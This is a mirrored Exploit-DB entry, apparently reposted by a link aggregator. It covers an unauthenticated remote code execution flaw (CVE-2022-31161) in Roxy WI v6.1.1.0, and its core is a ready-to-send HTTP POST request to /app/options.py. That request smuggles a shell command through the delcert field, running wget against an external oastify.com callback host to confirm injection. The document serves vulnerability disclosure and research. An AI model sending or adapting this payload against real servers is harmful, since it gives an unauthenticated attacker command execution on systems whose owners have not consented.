5

[webapps] Roxy WI v6.1.1.0 - Unauthenticated Remote Code Execution (RCE) via ssl...

 1 year ago
source link: https://www.exploit-db.com/exploits/51228
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

Roxy WI v6.1.1.0 - Unauthenticated Remote Code Execution (RCE) via ssl_cert Upload

EDB-ID:

51228

EDB Verified:

Exploit:

  /  

Platform:

Python

Date:

2023-04-03

Vulnerable App:

# ADVISORY INFORMATION
# Exploit Title: Roxy WI v6.1.1.0 - Unauthenticated Remote Code Execution (RCE) via ssl_cert Upload
# Date of found: 21 July 2022
# Application: Roxy WI <= v6.1.1.0
# Author: Nuri Çilengir 
# Vendor Homepage: https://roxy-wi.org
# Software Link: https://github.com/hap-wi/roxy-wi.git
# Advisory: https://pentest.blog/advisory-roxy-wi-unauthenticated-remote-code-executions-cve-2022-31137
# Tested on: Ubuntu 22.04
# CVE : CVE-2022-31161


# PoC
POST /app/options.py HTTP/1.1
Host: 192.168.56.116
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 123
Origin: https://192.168.56.116
Referer: https://192.168.56.116/app/login.py
Connection: close

show_versions=1&token=&alert_consumer=notNull&serv=127.0.0.1&delcert=a%20&%20wget%20<id>.oastify.com;

report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK